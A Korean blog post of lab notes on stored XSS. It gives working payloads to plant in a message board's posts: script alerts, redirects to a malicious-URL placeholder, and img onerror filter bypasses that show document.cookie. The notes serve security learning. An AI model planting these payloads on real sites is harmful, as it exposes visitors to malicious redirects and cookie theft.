Linux/모의해킹

stored XSS

GGkeeper 2022. 1. 21. 21:28

실습> stored XSS
저장된 XSS (DB에 저장)

공격자가 외부에서 공격 코드를 넣을 때 DB의 TB 구조를 어느정도는 예상하고 있어야 한다.
충분한 공격코드가 저장될 수 있어야만 공격에 성공할 수 있다.

게시판의 글쓰기 부분이 공격을 할 수 있는 부분임을 알 수 있다.

글쓰기에서 아래 코드를 넣고 저장한 후 글을 볼 때 창이 뜨면
Stored XSS 공격에 취약함을 알 수 있다.
<script>alert("XSS")</script>

악성코드로 리다이렉션 시키는 코드 (큰 따옴표로 작성해야한다.)
<script>location.href='악성URL';</script>
<script>location.href="악성URL";</script>
<script>location.href='https://naver.com';</script> <-- mywebsite에서는 에러발생

<script>location.href="https://naver.com";</script>

<script> 태그를 필터링하면 <img> 태그를 이용해서 우회할 수 있다.
<img src=xss.jpg onerror=alert(document.cookie)>
<img src=xss.jpg onerror=location.href="https://daum.net">

'Linux > 모의해킹' 카테고리의 다른 글

XSS 취약점 찾기  (0) 2022.01.25
reflected XSS  (0) 2022.01.21
XSS 이용한 쿠키값 탈취  (0) 2022.01.21
웹 세션 Hijacking  (0) 2022.01.21
session 이해하기  (0) 2022.01.21